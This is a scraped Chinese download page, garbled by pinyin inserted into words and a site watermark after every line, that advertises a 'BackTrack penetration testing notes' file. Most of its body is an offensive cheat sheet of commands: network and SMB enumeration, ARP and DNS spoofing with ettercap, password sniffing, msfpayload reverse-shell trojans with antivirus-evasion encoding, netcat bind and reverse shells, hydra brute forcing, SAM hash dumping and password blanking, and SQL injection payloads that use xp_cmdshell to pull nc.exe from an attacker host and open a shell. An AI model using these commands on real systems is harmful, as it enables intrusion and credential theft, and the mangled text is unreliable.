Warning: mkdir(): No space left on device in /www/wwwroot/jx.baidu.com/func.php on line 159

Warning: file_put_contents(./web/hch368.com/cache/5a/127c8/a5655.html): failed to open stream: No such file or directory in /www/wwwroot/jx.baidu.com/func.php on line 149
GG扑克
" />

GG扑克




  • 红软基地:您(nín)身(shēn)边最放心的安(ān)全下载(zǎi)站(zhàn)!
您所在的位(wèi)置:首页 > 软件(jiàn) > 应用软件(jiàn) > 教(jiāo)育学(xué)习 > BackTrack渗透测(cè)试笔(bǐ)记(jì)

BackTrack渗透(tòu)测试笔记

软件类型:
国产软件(jiàn)
软件语言:
简体中(zhōng)文
软件大小:
6 MB
软件(jiàn)授权(quán):
免费软件
软件评级:
4
更新(xīn)时间(jiān):
2017-05-25
应用平台:
WinXP, Win7, WinAll
软件简(jiǎn)介

BackTrack渗(shèn)透测(cè)试笔记是一款BT5学习笔(bǐ)记,使用BT5的同学(xué)可以(yǐ)看看,不仅仅是用(yòng)来破(pò)解(jiě)WIFI,BT5还有更强大的功能(néng)。 体(tǐ)积小,但(dàn)功能强大。界(jiè)面(miàn)非常清爽,简单易操作(zuò)。3a0红软基地

软件功能

0x01.1 PTES 标准中的渗透测试阶(jiē)段3a0红软基地
0x01.1.1 前期交互(hù)阶段(duàn)3a0红软基(jī)地
0x01.1.2 情报搜集阶段3a0红软基地
0x01.1.3 威(wēi)胁建模阶段3a0红软基地
0x01.1.4 漏洞分析阶段3a0红软基(jī)地
0x01.1.5 渗透攻(gōng)击阶段3a0红软基地(dì)
0x01.1.6 后渗透攻击阶段3a0红软基地
0x01.1.7 报告阶段3a0红软(ruǎn)基地
0x01.2 渗透测试类型3a0红软基地(dì)
0x01.2.1 白盒测试(shì)3a0红软基地
0x01.2.2 黑盒测试(shì)3a0红软基地
0x01.3 小(xiǎo)结3a0红软基地
0x02 渗透环境搭建3a0红软基地
>3a0红软基地(dì)
0x03 常(cháng)用(yòng)信息收集(jí)3a0红(hóng)软基地
0x03.1 被(bèi)动信息收(shōu)集3a0红软基地
0x03.2 主动信息(xī)收集3a0红软基地
0x03.3 针(zhēn)对性扫描3a0红(hóng)软基地
0x03.4 小结(jié)3a0红软基地(dì)
0x04 信(xìn)息收(shōu)集(jí)的附属工作3a0红软基地
0x04.1 基本(běn)的(de)漏(lòu)洞扫描3a0红软基地(dì)
0x04.2 使用 Nessus 进行扫描3a0红软基地
0x04.3 专用漏洞扫(sǎo)描器3a0红软基地
0x05 社会工程学攻击3a0红软基地
0x05.1 针对性(xìng)的(de)钓鱼攻(gōng)击3a0红(hóng)软基地(dì)
0x05.2 web 向量(liàng)攻击(jī)3a0红软基地
0x05.3 SET 的(de)其他特性3a0红软基地
0x05.4 小结。3a0红(hóng)软基(jī)地

软件说明

ping 域名/ip 测试本机(jī)到远(yuǎn)端(duān)主机是否联通。3a0红软(ruǎn)基地
dig 域名/ip 查看域名解析的(de)详细信息。3a0红软(ruǎn)基地
host -l 域名 dns服务器(qì) 传(chuán)输zone。3a0红软基地
扫描3a0红软基地
nmap:3a0红软基地
-sS 半(bàn)开(kāi)扫描(miáo)TCP和SYN扫描。3a0红软基(jī)地
-sT 完全TCP连接扫描(miáo)。3a0红软基地(dì)
-sU UDP扫描3a0红(hóng)软基(jī)地
-PS syn包探测(防火墙探测)3a0红软基(jī)地
-PA ack包探测(防(fáng)火墙探测)3a0红软基地
-PN 不ping。3a0红软基地
-n 不dns解(jiě)析。3a0红软基地
-A -O和-sV。3a0红软(ruǎn)基地
-O 操作系统识(shí)别(bié)。3a0红软基地
-sV 服务(wù)版本信息(banner)3a0红(hóng)软基地
-p 端口扫描。3a0红软基地
-T 设置时间级(jí)别(bié)(0-5)3a0红软基(jī)地
-iL 导入扫描结果。3a0红(hóng)软基地
-oG 输(shū)出扫描(miáo)结果。3a0红软基地
操作系(xì)统(tǒng)识别:3a0红软(ruǎn)基地(dì)
p0f -i eth0 -U -p 开启混杂模式。3a0红(hóng)软基地(dì)
xprobe2 ip|域(yù)名 检测os。3a0红(hóng)软基地
banner获(huò)取:3a0红软基地
nc ip port 检测端口(kǒu)是否打开。3a0红软基(jī)地
telnet ip port 检测(cè)端口是否(fǒu)打(dǎ)开。3a0红软基(jī)地
wget ip 下载主页(yè)。3a0红软基地
cat index.html | more 显示主页代码(mǎ)。3a0红软基地
q 退出。3a0红软基地
windows枚举(jǔ)3a0红软(ruǎn)基地
nmap -sS -p 139,445 ip 扫描windows。3a0红软基地
cd /pentest/enumeration/smb-enum3a0红软基地
nbtscan -f targetIP 检测netbioses。3a0红软基地
smbgetserverinfo -i targetIP 扫描(miáo)name,os,组。3a0红软基地(dì)
smbdumpusers -i targetIP 列出用户(hù)。3a0红软基地
smbclient -L //targetIP 列出共享。3a0红软基地
使用windows:3a0红软基(jī)地(dì)
net use \\ip\ipc$ "" /u:"" 开启空会话。3a0红软基(jī)地(dì)
net view \\ip 显示共享信息。3a0红软基地
smbclient:3a0红软基地
smbclient -L hostName -I targetIP 枚举共享。3a0红(hóng)软基地
smbclient -L hostName/share -U "" 用空用户连接。3a0红(hóng)软基(jī)地
smbclient -L hostName -I targetIP -U admin普通用户(hù)连(lián)接。3a0红软(ruǎn)基地
rpcclient:3a0红(hóng)软基地
rpcclient targetIP -U ""打开一(yī)个空(kōng)会话。3a0红软基地
netshareenum 枚举共享。3a0红软基地
enumdomusers 枚举用户。3a0红软基地
lsaenumsid 枚举域SID。3a0红软基(jī)地
queryuser RID 查询用(yòng)户信息。3a0红软基(jī)地
createdomuser 创建用户访(fǎng)问(wèn)。3a0红软基地
ARP欺(qī)骗(piàn):3a0红软(ruǎn)基地
ettercap:3a0红软基地(dì)
nano /usr/local/etc/etter.conf配置文件3a0红软(ruǎn)基地
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓(zhuā)包(bāo)的网卡3a0红软(ruǎn)基地(dì)
Hosts > Scan for hosts (do this two times)扫描网段的主机(jī)3a0红(hóng)软基地
Hosts > Hosts list 显(xiǎn)示主机列表3a0红软基地(dì)
Select the default gateway > Add to Target 1 添加主机3a0红软基地
Select the target > Add to Target 2 添加主机3a0红软基地
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击3a0红软基地
Start > Start sniffing 开(kāi)始(shǐ)攻(gōng)击3a0红软基地
dsniff -i eth0 监听网卡(kǎ)窃听登录用户密码3a0红软(ruǎn)基地
urlsnarf -i eth0 嗅探(tàn)http请求3a0红软基地
msgsnarf -i eth0 嗅探聊(liáo)天软件(jiàn)的聊天内容3a0红(hóng)软基地
driftnet -i eth0 网络(luò)管(guǎn)理嗅探图片,音频。3a0红软基地
dns欺骗:3a0红软基地
nano /usr/local/share/ettercap/etter.dns编辑(jí)配置文件3a0红软基地(dì)
Plugins > Manage the plugins > dns_spoof 设(shè)置(zhì)dns欺(qī)骗3a0红软基地
Mitm > Arp poisoning > Sniff remote connections > OK 设置(zhì)ARP3a0红软基地
Start > Start sniffing 开始攻击(jī)3a0红软基(jī)地
Exploits漏洞(dòng)利用:3a0红软基(jī)地
cd /pentest/exploits/exploit-db 进入目录3a0红(hóng)软基地
cat sploitlist.txt | grep -i [exploit] 查询需要(yào)的(de)漏(lòu)洞(dòng)3a0红软基(jī)地
cat exploit | grep "#include"检查运行环境3a0红软(ruǎn)基地
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运(yùn)行的代码3a0红(hóng)软基地
Metasploit:3a0红软基地(dì)
svn update 升(shēng)级3a0红软基地
./msfweb Web接(jiē)口(kǒu)127.0.0.1:55555。.3a0红软基地
./msfconsole 字符下的Console。3a0红软基地(dì)
help 帮助(zhù)3a0红软基地
show <option> 显示选项3a0红软基地(dì)
search <name> 搜索名字3a0红软基地
use <exploit name> 使用漏洞3a0红软基地
show options 显示(shì)选项(xiàng)3a0红(hóng)软基(jī)地(dì)
set <OPTION NAME> <option> 设置选项3a0红软基地
show payloads 显示装置3a0红软基地(dì)
set PAYLOAD <payload name> 设(shè)置装置3a0红软基(jī)地(dì)
show options 显(xiǎn)示(shì)选项3a0红软(ruǎn)基地
set <OPTION NAME> <option> 设置选项3a0红软基地
show targets 显示(shì)目标(os版本)3a0红软基地
set TARGET <target number> 设置(zhì)目标版本3a0红软基地(dì)
exploit 开始(shǐ)漏洞攻击3a0红软基地
sessions -l 列出会话3a0红软基(jī)地
sessions -i <ID> 选择会话3a0红软基地
sessions -k <ID> 结束会话3a0红软(ruǎn)基地
<ctrl> z 把(bǎ)会话放到(dào)后台(tái)3a0红(hóng)软基地
<ctrl> c 结束会话3a0红软基地
jobs 列出漏洞运行工作(zuò)3a0红(hóng)软基地
jobs -K 结束一个漏洞运行(háng)工(gōng)作3a0红软基地
show auxiliary 显示辅(fǔ)助(zhù)模块(kuài)3a0红软基地
use <auxiliary name> 使用辅(fǔ)助模块3a0红软基地
set <OPTION NAME> <option> 设(shè)置(zhì)选项3a0红软(ruǎn)基地
run 运行(háng)模块3a0红(hóng)软基地(dì)
scanner/smb/version 扫描系统版本3a0红软(ruǎn)基地
scanner/mssql/mssql_ping 测试(shì)mssql是否在线3a0红软基地
scanner/mssql/mssql_login 测试登录(暴力或字典)3a0红软基(jī)地
Attacker behind firewall: bind shell正(zhèng)向3a0红软基(jī)地
Target behind firewall: reverse shell反向3a0红软基地
Meterpreter衔接不(bú)懂(dǒng)dos的可以用这个:3a0红软(ruǎn)基地
db_import_nessus_nbe 加载(zǎi)nessus的扫描(miáo)结果3a0红软基地
db_import_nmap_xml 加载nmap的扫(sǎo)描结果3a0红软基地
自动化攻(gōng)击流程:3a0红软基地
cd /pentest/exploit/framework33a0红(hóng)软基(jī)地
./msfconsole3a0红软基(jī)地
load db_sqlite33a0红软(ruǎn)基地
db_destroy pentest3a0红软基地
db_create pentest3a0红软基(jī)地
db_nmap targetIP3a0红软基地
db_hosts3a0红(hóng)软基地
db_services3a0红软基地
db_autopwn -t -p -e3a0红(hóng)软基(jī)地
字(zì)符(fú)接口攻击流程:3a0红软基地
./msfcli | grep -i <name>3a0红软(ruǎn)基地
./msfcli <exploit or auxiliary> S3a0红(hóng)软基地(dì)
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E3a0红软基地
做木马后门等(děng):3a0红软(ruǎn)基地
./msfpayload <payload> <variable=value> <output type>3a0红软基地
S summary and options of payload3a0红软基地(dì)
C C language3a0红软基地(dì)
P Perl3a0红软基地
y Ruby3a0红软基地
R Raw, allows payload to be piped into msfencode and other tools3a0红(hóng)软基(jī)地
J JavaScript3a0红软(ruǎn)基(jī)地
X Windows executable3a0红软基地
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C3a0红软基地
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe3a0红软基地
编码(mǎ)处理就是做免杀(shā):3a0红软基地
./msfencode <options> <variable=value>3a0红软(ruǎn)基地(dì)
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -l3a0红软(ruǎn)基(jī)地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -e PexFnstenvMor -t c3a0红软基地
入侵后在windows下添加(jiā)管理员(yuán)用户:3a0红软基地
hostname 查看(kàn)主机名3a0红(hóng)软基地
net users 查看用户3a0红软基地
net user 用户 密码 /add 添加用(yòng)户3a0红软基地
net localgroup 查看工(gōng)作组3a0红软基地
net localgroup administrators 查看管理员组3a0红软基地
net localgroup administrators x /add 将用(yòng)户加(jiā)入管理员组3a0红软基(jī)地(dì)
TFTP3a0红软基地
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上3a0红软(ruǎn)基地
tftp -i 10.1.1.2 GET nc.exe下(xià)载3a0红软基地
netcat瑞士军刀(dāo)3a0红软基(jī)地
attacker: 10.1.1.13a0红软基地(dì)
target: 10.1.1.23a0红软基地
nc -v -z 10.1.1.2 1-1024 端口扫描3a0红(hóng)软(ruǎn)基地(dì)
target: nc -lvp 4444 聊天设置(服务)3a0红软基(jī)地
attacker: nc -v 10.1.1.2 4444 聊天(tiān)设置(zhì)(客(kè)户)3a0红软基地
target: nc -lvp 4444 > output.txt传输文件(接受)3a0红软基地(dì)
attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发(fā)送)3a0红软(ruǎn)基(jī)地
target: nc -lvp 4444 -e cmd.exe Bind shell。3a0红软基地(dì)
attacker: nc -v 10.1.1.2 44443a0红软基地
target:nc -lvp 4444 Reverse shell。3a0红软基地
attacker:nc -v 10.1.1.2 4444 -e /bin/bash3a0红(hóng)软基地
密码3a0红软基(jī)地
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words3a0红软基地
cat words | wc -l显示(shì)个数(30多万个)3a0红软(ruǎn)基地
暴力(lì):3a0红软基地
hydra -l ftp -P words -v targetIP ftp 攻(gōng)击ftp。3a0红软基(jī)地
hydra -l muts -P words -v targetIP pop3 攻击(jī)pop33a0红软(ruǎn)基(jī)地
hydra -P words -v targetIP snmp 攻(gōng)击snmp3a0红(hóng)软基地
攻击(jī)microsof VPN3a0红(hóng)软基地
nmap -p 1723 targetIP3a0红(hóng)软基地
dos2unix words3a0红软基地
cat words | thc-pptp-bruter targetIP3a0红软基地
WYD:3a0红软基地
wget -r target.com –accept=pdf 下载pdf文档3a0红软基地
wyd.pl -o output.txt .target.com/3a0红软基地
cat output.txt | more3a0红软基地
SAM文件(jiàn)(windows下的密码文(wén)件):3a0红软基(jī)地(dì)
%SYSTEMROOT%/system32/config3a0红(hóng)软基地
%SYSTEMROOT%/repair3a0红软(ruǎn)基地
备份(fèn)windows的(de)hash文件(jiàn):3a0红软基地(dì)
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E3a0红软基地
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\3a0红(hóng)软基(jī)地
meterpreter > execute -f cmd -c3a0红(hóng)软基地
meterpreter > interact x3a0红软基地
C:\WINDOWS\system32> pwdump \\127.0.0.13a0红软基(jī)地
john破解密(mì)码:3a0红软基地
cp hash.txt /pentest/password/john-1.7.2/run/3a0红(hóng)软基(jī)地
cd /pentest/password/john-1.7.2/run/3a0红(hóng)软基地
./john hash.txt3a0红软基地
彩(cǎi)虹表:3a0红软基地
rcrack *.rt -f hash.txt3a0红软基地
本地修改(gǎi)密码:3a0红软(ruǎn)基(jī)地
mount3a0红软基地
umount /mnt/hda13a0红软基地
modprobe fuse3a0红软基(jī)地(dì)
ntfsmount /dev/hda1 /mnt/hda13a0红软基地
mount3a0红软基地
ls -l /mnt/hda1 挂载c盘3a0红软基地
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt3a0红软基地
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备(bèi)份sam文件3a0红软基地(dì)
直接修改sam文(wén)件:3a0红软(ruǎn)基地
chntpw /mnt/sda1/WINDOWS/system32/config/SAM3a0红软基地
Blank the password. *3a0红软基地
Do you really wish to change it? y3a0红软基(jī)地
Write hive files? y3a0红软基地(dì)
unmount /mnt/sda13a0红软基地
reboot3a0红软(ruǎn)基地
SQL 注入3a0红软(ruǎn)基地(dì)
nmap -sS -p 1521 targetIP 扫描oracle3a0红软基地
nmap -sS -p T:1433,U:1434 targetIP 扫描(miáo)mssql3a0红软基(jī)地(dì)
' or 1=1–验证(zhèng)旁路(lù)3a0红软基地
列(liè)举表名:3a0红软基(jī)地
' having 1=1–3a0红软基地
' group by table having 1=1–3a0红软基地
' group by table, table2 having 1=1–3a0红软基地
' group by table, table2, table3 having 1=1–3a0红软基地
列举列(liè)类型:3a0红软(ruǎn)基地
union select sum(column) from table –3a0红(hóng)软基地
union select sum(column2) from table –3a0红软基地
添加(jiā)数(shù)据:3a0红软基地(dì)
' ; insert into table values('value','value2′,'value3′)–3a0红软(ruǎn)基地
MSSQL存储程序(xù):3a0红软基(jī)地
输出(chū)数据库中(zhōng)备案信息到一个html文件(jiàn),您可以查看与一个浏览(lǎn)器。3a0红(hóng)软基地
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; —.target.com/test.html3a0红软(ruǎn)基(jī)地
运(yùn)行ipconfig在浏览器查看信息。3a0红(hóng)软基地
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' .target.com/test.txt3a0红软基地
上(shàng)传后门。3a0红(hóng)软基地
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; –3a0红软基地
攻(gōng)击者: nc -lvp 533a0红软基地
spreadfold。3a0红软(ruǎn)基地

相关介绍

bt5,全(quán)称Back Track five,是继bt3,bt4之后的最新版。这是一个linux环境的(de)便携(xié)系统,可以放(fàng)到U盘或者硬(yìng)盘中启动,对本身硬盘没有(yǒu)影响,无需在本(běn)地安(ān)装。内置大量(liàng)的网(wǎng)络安全检(jiǎn)测工具以(yǐ)及黑客破解软件等。3a0红软基地(dì)

软(ruǎn)件截图

BackTrack渗透测试(shì)笔记3a0红软基地

软件下(xià)载地址
BackTrack渗透测试笔记(jì)
软件(jiàn)推荐
下载排行

精品软件

热门(mén)关键词(cí)

热(rè)门软(ruǎn)件(jiàn)推荐